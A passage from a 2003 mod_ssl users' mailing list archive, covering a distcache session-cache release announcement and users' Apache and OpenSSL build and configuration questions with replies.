> requests are to be simply ignored. I thought I knew how to do this, but 
> then read something about using mod_rewrite which gave me a headache. 
> Is there a simple how-to describing how to run your server so it 
> responds only to https over port 443?
> 
> Thanks,
> Jay
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Feb 25 01:29:02 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 26EE32AA033; Tue, 25 Feb 2003 01:29:02 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from VL-MS-MR004.sc1.videotron.ca (relais.videotron.ca [24.201.245.36])
	by master.modssl.org (Postfix) with ESMTP id 27DC32AA01D
	for ; Tue, 25 Feb 2003 01:29:00 +0100 (CET)
Received: from steerpike.geoffthorpe.net ([24.202.196.90])
 by VL-MS-MR004.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 1.10 (built Jan 23 2003))
 with SMTP id <0HAU00KXW9EP8Q@VL-MS-MR004.sc1.videotron.ca> for
 modssl-users@modssl.org; Mon, 24 Feb 2003 19:30:27 -0500 (EST)
Received: by steerpike.geoffthorpe.net (sSMTP sendmail emulation); Mon,
 24 Feb 2003 19:28:49 -0500
Date: Mon, 24 Feb 2003 19:28:49 -0500
From: Geoff Thorpe 
Subject: [ANNOUNCE] Distcache 0.3 released
To: Modssl Users List 
Message-id: <20030225002849.GA3026@grumpy.geoffnet>
X-Info: http://www.geoffthorpe.net
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-transfer-encoding: 7BIT
Content-disposition: inline
User-Agent: Mutt/1.4i
X-Editor: Vim http://www.vim.org/
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,

I'd like to announce the release of version 0.3 of distcache, a toolkit
for distributed session caching. This is the first release I consider
ready for general use - we've upgraded the status from pre-alpha to
alpha, though in reality I think it's more like a beta minus various
packaging extras that would be needed for a normal beta release. In other
words, it should be solid - but until it gets some testing in different
environments and configurations, we won't bet the house on it. Yet.

The home page is at;
    http://www.distcache.org/

There is a support package for integration with mod_ssl (2.8.12) and
another for integration with Apache 2 (2.0.44). I am hoping to find time
to coax this integration into a form that could be integrated into
mainstream releases (right now, if you apply the patches you get
distcache support whether you want it or not :-)

The rest of this note contains some information on what distcache is and
what it can do. It's (more or less) the same info I'm sending to other
relevant mail lists too, and you can stop reading if you are not
interested in distcache at all or if you are interested but intend to
download the code and view the README.

So, quick basics: distcache exists to provide a session cache and a
light-weight async network protocol (+ wrapper library and utils) for
manipulating caches. The typical configuration has a session cache server
listening on an arbitrary machine, eg. listening on an IPv4 port;

    dc_server -daemon -listen IP:9001

or just one IPv4 interface;

    dc_server -daemon -listen IP:192.168.0.1:9001

or on a unix domain socket (for single-machine setups);

    dc_server -daemon -listen UNIX:/tmp/name-your-socket

Client programs (apache, stunnel, whatever) can communicate directly with
the server if desired, but the protocol has been built with the idea of
local agents performing their work for them - this typically improves
scalability and allows client programs to be a little more robust by
opening temporary unix domain connections to the agent rather than the
large overheads (and TIME_WAIT bloatage) of connecting over IPv4. This is
also far easier than having applications try to intelligently manage
connection pools, etc. Eg. a machine hosting an SSL/TLS server
application would start an agent via;

    dc_client -daemon -listen UNIX:/tmp/dc_client \
        -server IP:192.168.0.1:9001

Each agent holds open a single persistent connection with the dc_server
instance, and any and all application connections to dc_client are
multiplexed back and forth through the persistent connection. dc_client
is quite robust in the event of network errors, and will periodically
attempt to re-connect with the server as/when it loses connectivity.
Caching operations will "fail" gracefully during such downtimes but will
automatically start functioning properly again when communications are
re-established. This is configurable behaviour.

Likewise for the client API used for making OpenSSL-based applications
distcache-aware, the context creation specifies the address of the
dc_client (or dc_server) instance - if the required utilities are not
running or are experiencing network problems, caching will silently fail
in the application (ie. session-resumes fail and become full handshakes,
no caching of negotiated sessions, etc) but will start functioning again
as/when the cache tools and the network is up and running.

Finally, the protocol is extremely lightweight - I have regularly pushed
15,000 cache operations per second through a modest desktop test, and the
network protocol itself is thin enough that is it dominated by the size
of session data it carries which itself is also quite small (eg. approx
128 bytes for a standard SSL/TLS session serialised by OpenSSL, or ~1Kb
when the server requires client certificate authentication). A 10Mbit
link can easily sustain enough distcache traffic to satisfy an enormously
high-load SSL/TLS cluster (which we can safely assume would be using
something better than 10Mbit ethernet :-), and likewise the overhead of
the tools even at those enormous volumes are minimal on the system. So,
your application (and OpenSSL's SSL/TLS implementation) will remain the
limiting factor and it would highly surprising if you could find any
difference at all w.r.t. latency or overhead by using distcache. The
benefit on the other hand is that different machines can transparently
resume sessions negotiated by each other - thus making the scalability
and load-balancing semantics of your server network more flexible.

Enough already. Any/all feedback is most welcome.

Regards,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Feb 25 14:14:14 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 625002AA024; Tue, 25 Feb 2003 14:14:14 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mta02-svc.ntlworld.com (mta02-svc.ntlworld.com [62.253.162.42])
	by master.modssl.org (Postfix) with ESMTP id AB7592AA015
	for ; Tue, 25 Feb 2003 14:14:12 +0100 (CET)
Received: from larry-cdl4wdmfm.ntlworld.com ([62.253.144.131])
          by mta02-svc.ntlworld.com
          (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP
          id <20030225131411.OHUC4529.mta02-svc.ntlworld.com@larry-cdl4wdmfm.ntlworld.com>
          for ; Tue, 25 Feb 2003 13:14:11 +0000
Message-Id: <5.1.0.14.0.20030225125655.00a5b348@pop3.norton.antivirus>
X-Sender: laurence.cotton/pop.ntlworld.com@pop3.norton.antivirus
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Tue, 25 Feb 2003 13:14:22 +0000
To: modssl-users@modssl.org
From: Larry Cotton 
Subject: Shared mod_ssl problems
Mime-Version: 1.0
Content-Type: multipart/alternative;
	boundary="=====================_1746030==_.ALT"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Larry Cotton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--=====================_1746030==_.ALT
Content-Type: text/plain; charset="us-ascii"; format=flowed

Hi

I'm attempting to load mod_ssl into apache as a dynamic module.

I am using apache 2.0.44 (which comes with its own ssl module) and OpenSSL 
version 0.9.7a.

I'm using red hat linux ver 7.1. uname -r gives the following output :
Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 
unknown.

I have configured and built apache to enable shared objects and include ssl 
and have set up the configuration file to use ssl (this might be incorrect, 
but I don't believe that would be related to the problem I have here).

When I try to start apache I get an error message :

Syntax error on line 251 of /home/Larry/WebServer/Apache/conf/httpd.conf:
Cannot load /home/Larry/WebServer/Apache/modules/mod_ssl.so into server: 
undefined symbol: X509_free

 From what I can gather this is because I've built a shared mod_ssl against 
against a static OpenSSL.

Ideally I would like to link ssl dynamically and I guess the solution is to 
use shared openssl libraries (libcrypto.so and libssl.so). Does anyone know :
a) How (or even if) I can build a shared OpenSSL (or where I can find out)
b) How I link these shared libraries into apache (can I use the standard 
LoadModule directive for the OpenSSL libs, or do I need some special SSL 
configuration ?) - or where I can find this out.

Cheers
Larry



--=====================_1746030==_.ALT
Content-Type: text/html; charset="us-ascii"


Hi


I'm attempting to load mod_ssl into apache as a dynamic module.


I am using apache 2.0.44 (which comes with its own ssl module) and
OpenSSL version 0.9.7a.


I'm using red hat linux ver 7.1. uname -r gives the following output
:

Linux localhost.localdomain 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000
i686 unknown.


I have configured and built apache to enable shared objects and include
ssl and have set up the configuration file to use ssl (this might be
incorrect, but I don't believe that would be related to the problem I
have here).


When I try to start apache I get an error message :


Syntax error on line 251 of
/home/Larry/WebServer/Apache/conf/httpd.conf:

Cannot load /home/Larry/WebServer/Apache/modules/mod_ssl.so into server:
undefined symbol: X509_free


 From what I can gather this is because I've built a shared mod_ssl
against against a static OpenSSL.


Ideally I would like to link ssl dynamically and I guess the solution is
to use shared openssl libraries (libcrypto.so and libssl.so). Does anyone
know :

a) How (or even if) I can build a shared OpenSSL (or where I can find
out)

b) How I link these shared libraries into apache (can I use the standard
LoadModule directive for the OpenSSL libs, or do I need some special SSL
configuration ?) - or where I can find this out.


Cheers

Larry






--=====================_1746030==_.ALT--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Feb 25 15:56:00 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A6DB22AA046; Tue, 25 Feb 2003 15:56:00 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.slb.com (eurmta01.london.eur.slb.com [134.32.26.55])
	by master.modssl.org (Postfix) with ESMTP id 7CE3D2AA01D
	for ; Tue, 25 Feb 2003 15:55:59 +0100 (CET)
Received: from conversion-daemon.eurmta01.london.eur.slb.com by
 eurmta01.london.eur.slb.com
 (iPlanet Messaging Server 5.2 HotFix 1.02 (built Sep 16 2002))
 id <0HAV00A01BO45E@eurmta01.london.eur.slb.com> for modssl-users@modssl.org;
 Tue, 25 Feb 2003 14:52:36 +0000 (GMT)
Received: from srv003snap.naples.eur.slb.com
 (srv003snap.naples.eur.slb.com [134.32.195.159])
 by eurmta01.london.eur.slb.com
 (iPlanet Messaging Server 5.2 HotFix 1.02 (built Sep 16 2002))
 with ESMTP id <0HAV008NPB5O66@eurmta01.london.eur.slb.com> for
 modssl-users@modssl.org; Tue, 25 Feb 2003 14:05:50 +0000 (GMT)
Received: by SRV003SNAP with Internet Mail Service (5.5.2653.19)
	id ; Tue, 25 Feb 2003 15:05:14 +0100
Content-return: allowed
Date: Tue, 25 Feb 2003 15:05:13 +0100
From: Zampognaro Sergio 
Subject: Linux Red Hat 7.2 + openSSL 0.9.7 + Apache 1.3.27 + mod_ssl 2.8.1	2 =
 PROBLEMS!!!
To: modssl-users@modssl.org
Message-id: <49FCBDCB40420B409FB4EA8D712CC66D065649@SRV003SNAP>
MIME-version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-type: multipart/alternative;
 boundary="Boundary_(ID_oLCZFkWmmH59GHoz64aqKg)"
Importance: high
X-Priority: 1
Sensitivity: Company-Confidential
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Zampognaro Sergio 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

--Boundary_(ID_oLCZFkWmmH59GHoz64aqKg)
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7BIT

Hi,
everything is in the subject!
I installed everything following this procedure:

$ ./config --prefix=/home/aspco1/openSSL
$ make
$ make test
$ make install

#   extract the packages
$ gzip -d -c apache_1.3.27.tar.gz | tar xvf -
$ gzip -d -c mod_ssl-2.8.12-1.3.27.tar.gz | tar xvf -

#   apply mod_ssl to Apache source tree
$ cd /mod_ssl-2.8.12-1.3.27
$ ./configure --with-apache=../apache_1.3.27
$ cd ..

#   build/install Apache with mod_ssl
$ cd apache_1.3.27
$ SSL_BASE=/home/aspco1/openSSL 
$ ./configure --prefix=/home/aspco1/apache_1.3.27 --enable-module=proxy
--enable-module=ssl 
$ make
$ make certificate TYPE=test
$ make install
$ cd ..
    
#   cleanup after work
$ rm -rf mod_ssl-2.8.12-1.3.27
$ rm -rf apache_1.3.27

Everything seems to be ok, but when I try to start the web server:

$ apachectl start
Ouch! ap_mm_create(1048576, "/var/run/httpd.mm.22620") failed
Error: MM: mm:core: failed to open semaphore file (Permission denied): OS:
No such file or directory
/usr/sbin/apachectl start: httpd could not be started

> Even bad with SSL:
> 
$ apachectl startssl
usage: /usr/sbin/apachectl
(start|stop|restart|fullstatus|status|graceful|configtest|help)

start      - start httpd
stop       - stop httpd
restart    - restart httpd if running by sending a SIGHUP or start if
             not running
fullstatus - dump a full status screen; requires lynx and mod_status enabled
status     - dump a short status screen; requires lynx and mod_status
enabled
graceful   - do a graceful restart by sending a SIGUSR1 or start if not
running
configtest - do a configuration syntax test
help       - this screen

(startssl is not recognized!!!), and finally:

$ httpd -l
Compiled-in modules:
  http_core.c
  mod_so.c
suexec: enabled; valid wrapper /usr/sbin/suexec

> Even if I compiled with --enable-module=proxy --enable-module=ssl options
> I can't see proxy and ssl modules in the list of compiled-in modules!!!
> 
What's happening???

thanks
Sergio

--Boundary_(ID_oLCZFkWmmH59GHoz64aqKg)
Content-type: text/html; charset=iso-8859-1
Content-transfer-encoding: 7BIT






Linux Red Hat 7.2 + openSSL 0.9.7 + Apache 1.3.27 + mod_ssl 2.8.12 = PROBLEMS!!!




Hi,

everything is in the subject!

I installed everything following this procedure:




$ ./config --prefix=/home/aspco1/openSSL

$ make

$ make test

$ make install




#   extract the packages

$ gzip -d -c apache_1.3.27.tar.gz | tar xvf -

$ gzip -d -c mod_ssl-2.8.12-1.3.27.tar.gz | tar xvf -




#   apply mod_ssl to Apache source tree

$ cd /mod_ssl-2.8.12-1.3.27

$ ./configure --with-apache=../apache_1.3.27

$ cd ..




#   build/install Apache with mod_ssl

$ cd apache_1.3.27

$ SSL_BASE=/home/aspco1/openSSL 

$ ./configure --prefix=/home/aspco1/apache_1.3.27 --enable-module=proxy --enable-module=ssl 

$ make

$ make certificate TYPE=test

$ make install

$ cd ..

    

#   cleanup after work

$ rm -rf mod_ssl-2.8.12-1.3.27

$ rm -rf apache_1.3.27




Everything seems to be ok, but when I try to start the web server:




$ apachectl start

Ouch! ap_mm_create(1048576, "/var/run/httpd.mm.22620") failed

Error: MM: mm:core: failed to open semaphore file (Permission denied): OS: No such file or directory

/usr/sbin/apachectl start: httpd could not be started




Even bad with SSL:




$ apachectl startssl

usage: /usr/sbin/apachectl (start|stop|restart|fullstatus|status|graceful|configtest|help)




start      - start httpd

stop       - stop httpd

restart    - restart httpd if running by sending a SIGHUP or start if

             not running

fullstatus - dump a full status screen; requires lynx and mod_status enabled

status     - dump a short status screen; requires lynx and mod_status enabled

graceful   - do a graceful restart by sending a SIGUSR1 or start if not running

configtest - do a configuration syntax test

help       - this screen




(startssl is not recognized!!!), and finally:




$ httpd -l

Compiled-in modules:

  http_core.c

  mod_so.c

suexec: enabled; valid wrapper /usr/sbin/suexec




Even if I compiled with --enable-module=proxy --enable-module=ssl options I can't see proxy and ssl modules in the list of compiled-in modules!!!



What's happening???




thanks

Sergio






--Boundary_(ID_oLCZFkWmmH59GHoz64aqKg)--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Feb 25 16:15:20 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B02C62AA046; Tue, 25 Feb 2003 16:15:20 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id 8A1FD2AA01D
	for ; Tue, 25 Feb 2003 16:15:19 +0100 (CET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id h1PFFIFY011353
	for ; Tue, 25 Feb 2003 16:15:18 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id h1PFFB2O024403
	for ; Tue, 25 Feb 2003 16:15:17 +0100 (MET)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Linux Red Hat 7.2 + openSSL 0.9.7 + Apache 1.3.27 + mod_ssl 2.8.1	2 = PROBLEMS!!!
Date: Tue, 25 Feb 2003 16:15:15 +0100
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Linux Red Hat 7.2 + openSSL 0.9.7 + Apache 1.3.27 + mod_ssl 2.8.1	2 = PROBLEMS!!!
Importance: normal
thread-index: AcLc3izhG6JpP40uQnS7qGUO2SFUEQAAUSoA
Sensitivity: Company-Confidential
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

PLain text please..

Now you have to plough through the mail below to find my comments

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored. 

-----Original Message-----
From: Zampognaro Sergio [mailto:SZampognaro@naples.sema.slb.com]
Sent: Dienstag, 25. Februar 2003 15:05
To: modssl-users@modssl.org
Subject: Linux Red Hat 7.2 + openSSL 0.9.7 + Apache 1.3.27 + mod_ssl
2.8.1 2 = PROBLEMS!!!
Importance: High
Sensitivity: Confidential


Hi, 
everything is in the subject! 
I installed everything following this procedure: 
$ ./config --prefix=/home/aspco1/openSSL 
$ make 
$ make test 
$ make install 
#   extract the packages 
$ gzip -d -c apache_1.3.27.tar.gz | tar xvf - 
$ gzip -d -c mod_ssl-2.8.12-1.3.27.tar.gz | tar xvf - 
#   apply mod_ssl to Apache source tree 
$ cd /mod_ssl-2.8.12-1.3.27 
$ ./configure --with-apache=../apache_1.3.27 
$ cd .. 
#   build/install Apache with mod_ssl 
$ cd apache_1.3.27 
$ SSL_BASE=/home/aspco1/openSSL 
$ ./configure --prefix=/home/aspco1/apache_1.3.27 --enable-module=proxy
--enable-module=ssl 
$ make 
$ make certificate TYPE=test 
$ make install 
$ cd .. 
    
#   cleanup after work 
$ rm -rf mod_ssl-2.8.12-1.3.27 
$ rm -rf apache_1.3.27 
Everything seems to be ok, but when I try to start the web server: 
$ apachectl start 
Ouch! ap_mm_create(1048576, "/var/run/httpd.mm.22620") failed 
Error: MM: mm:core: failed to open semaphore file (Permission denied):
OS: No such file or directory 
/usr/sbin/apachectl start: httpd could not be started 

*********************************************************************

Why is apachectl in /usr/sbin/apachectl? This sounds like the default
installation that came with RH. Your apachectl and httpd should be in
/home/aspco1/apache_1.3.27/bin. What happens if you do
/home/aspco1/apache_1.3.27/bin/apachectl startssl? I think this is your
MAIN problem... 

Be certain you are executing the right apache before proceeding!

Also, did you install the MM shared memory library
(http://www.ossp.org/pkg/lib/mm/)? I don't think it is entirely
necessary although I've never installed without it.

*********************************************************************

Even bad with SSL: 
$ apachectl startssl 
usage: /usr/sbin/apachectl
(start|stop|restart|fullstatus|status|graceful|configtest|help) 
start      - start httpd 
stop       - stop httpd 
restart    - restart httpd if running by sending a SIGHUP or start if 
             not running 
fullstatus - dump a full status screen; requires lynx and mod_status
enabled 
status     - dump a short status screen; requires lynx and mod_status
enabled 
graceful   - do a graceful restart by sending a SIGUSR1 or start if not
running 
configtest - do a configuration syntax test 
help       - this screen 
(startssl is not recognized!!!), and finally: 
$ httpd -l 
Compiled-in modules: 
  http_core.c 
  mod_so.c 
suexec: enabled; valid wrapper /usr/sbin/suexec 
Even if I compiled with --enable-module=proxy --enable-module=ssl
options I can't see proxy and ssl modules in the list of compiled-in
modules!!!
What's happening??? 
thanks 
Sergio

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 26 00:29:46 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3B6902AA036; Wed, 26 Feb 2003 00:29:46 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from spf1.us.outblaze.com (205-158-62-139.outblaze.com [205.158.62.139])
	by master.modssl.org (Postfix) with SMTP id C38032AA01E
	for ; Wed, 26 Feb 2003 00:29:27 +0100 (CET)
Received: (qmail 774 invoked from network); 25 Feb 2003 23:29:25 -0000
Received: from unknown (205.158.62.68)
  by spf1.us.outblaze.com with QMQP; 25 Feb 2003 23:29:25 -0000
Received: (qmail 25032 invoked from network); 25 Feb 2003 22:46:53 -0000
Received: from unknown (HELO ws1-10.us4.outblaze.com) (205.158.62.111)
  by 205-158-62-153.outblaze.com with SMTP; 25 Feb 2003 22:46:53 -0000
Received: (qmail 8719 invoked by uid 1001); 25 Feb 2003 22:46:52 -0000
Message-ID: <20030225224652.8718.qmail@iname.com>
Content-Type: text/plain; charset="iso-8859-1"
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
MIME-Version: 1.0
X-Mailer: MIME-tools 5.41 (Entity 5.404)
Received: from [194.228.23.10] by ws1-10.us4.outblaze.com with http for
    bos@writeme.com; Tue, 25 Feb 2003 17:46:52 -0500
From: "Jirka Vejrazka" 
To: modssl-users@modssl.org
Date: Tue, 25 Feb 2003 17:46:52 -0500
Subject: Re: Shared mod_ssl problems
X-Originating-Ip: 194.228.23.10
X-Originating-Server: ws1-10.us4.outblaze.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jirka Vejrazka" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

  I've faced exactly the same problem "undefined symbol: X509_free"
> Ideally I would like to link ssl dynamically and I guess the solution is to use shared openssl libraries (libcrypto.so and libssl.so). Does anyone know :
> a) How (or even if) I can build a shared OpenSSL (or where I can find out)

  "config shared" worked fine for me (instead of simple "config") -  don't forget "configure -s" for zlib if you compile zlib that will be used by this OpenSSL

> b) How I link these shared libraries into apache (can I use the standard LoadModule directive for the OpenSSL libs, or do I need some special SSL configuration ?) - or where I can find this out.

  LoadModule works well - of course you have to have Apache with mod_so module.

  Jirka Vejrazka
-- 
__________________________________________________________
Sign-up for your own FREE Personalized E-mail at Mail.com
http://www.mail.com/?sr=signup

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 26 04:34:46 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A9E3B2AA051; Wed, 26 Feb 2003 04:34:46 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtpde02.sap-ag.de (smtpde02.sap-ag.de [155.56.68.170])
	by master.modssl.org (Postfix) with ESMTP id E7DB42AA015
	for ; Wed, 26 Feb 2003 04:34:44 +0100 (CET)
Received: from sap-ag.de (smtpde02)
  by smtpde02.sap-ag.de (out) with ESMTP id EAA11554;
  Wed, 26 Feb 2003 04:34:55 +0100 (MEZ)
Date: Wed, 26 Feb 2003 04:34:41 +0100
From: Maik Mueller 
X-Mailer: The Bat! (v1.62 Christmas Edition) Personal
X-Priority: 3 (Normal)
Message-ID: <1442332764.20030226043441@sap.com>
To: ulrich.lohrmann@dsv-gruppe.de
Cc: modssl-users@modssl.org
Subject: Re: SSLProxy - Howto delegate Client Certificate to backend server
In-Reply-To: 
References: 
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-SAP: out
X-SAP: out
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Maik Mueller 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello ulrich,

Friday, February 21, 2003, 7:39:07 AM, you wrote:

uldgd> I have the following scenario:
uldgd> Apache webserver 2.0.44 with mod_ssl requires client authentication during
uldgd> SSL handshake
uldgd> for a particular URL. All further requests coming in over the established
uldgd> SSL connection are
uldgd> delegated to a backend server. The connection between the webserver and the
uldgd> backend
uldgd> server is also configured to be a SSL connection with client
uldgd> authentication, so the webserver
uldgd> has to provide a client certificate to the backend server.

uldgd> I'd like to pass the client certificate provided by the end user to the
uldgd> backend server. Is there a
uldgd> chance to do this with mod_ssl?
I believe everything you are looking for is in the patch I posted on
Wed, 19 Feb 2003 (RE: Patches and Enhancements for a SSL-Proxy Based
on Apache 2.0 (mod_ssl, mod_proxy, mod_headers)).
If you find my patch useful I would appreciate any help to make it
part of future Apache distributions.

-- 
Best regards,
 Maik                            mailto:maiklst@hw1464.wdf.sap-ag.de

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 26 10:34:19 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 475CF2AA036; Wed, 26 Feb 2003 10:34:19 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from beaucox.com (cap175-219-202.pixi.net [207.175.219.202])
	by master.modssl.org (Postfix) with ESMTP id C2C7A2AA015
	for ; Wed, 26 Feb 2003 10:34:16 +0100 (CET)
Received: from rocky (207.175.219.203)
	by beaucox.com with [XMail 1.11 (Linux/Ix86) ESMTP Server]
	id  for  from ;
	Tue, 25 Feb 2003 23:34:14 -1000
From: "Beau E. Cox" 
To: 
Subject: Using ssl/mod_ssl on non-apache HTTP server
Date: Tue, 25 Feb 2003 23:34:14 -1000
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Beau E. Cox" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi -

I'm new to ssl/mod_ssl so please forgive me if this post
is out in left field. I have a new contract to develop
secure TCP/IP communication between many customer sites.
I have prototyped a non-secure HTTP server/client system
written in Perl. My client likes it - but he demands high-
level security.

In my years of web programming, there has always been the
'security' guy around to take care of these 'details' for
me, but now I am him... :)

I have been plowing through the Openssl, Perl modules
(Net::SSLeay, etc.) documentation, but it's slow going
and it hasn't 'clicked' yet for me.

Do any of you have suggestions of other resources that
might help me? HOWTOs, FAQs, Articles, Books, anything?

Aloha => Beau.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Feb 26 10:43:36 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 139F72AA036; Wed, 26 Feb 2003 10:43:36 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from beaucox.com (cap175-219-202.pixi.net [207.175.219.202])
	by master.modssl.org (Postfix) with ESMTP id 5D30E2AA02B
	for ; Wed, 26 Feb 2003 10:43:29 +0100 (CET)
Received: from rocky (207.175.219.203)
	by beaucox.com with [XMail 1.11 (Linux/Ix86) ESMTP Server]
	id  for  from ;
	Tue, 25 Feb 2003 23:43:28 -1000
From: "Beau E. Cox" 
To: 
Subject: RE: Using ssl/mod_ssl on non-apache HTTP server
Date: Tue, 25 Feb 2003 23:43:27 -1000
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
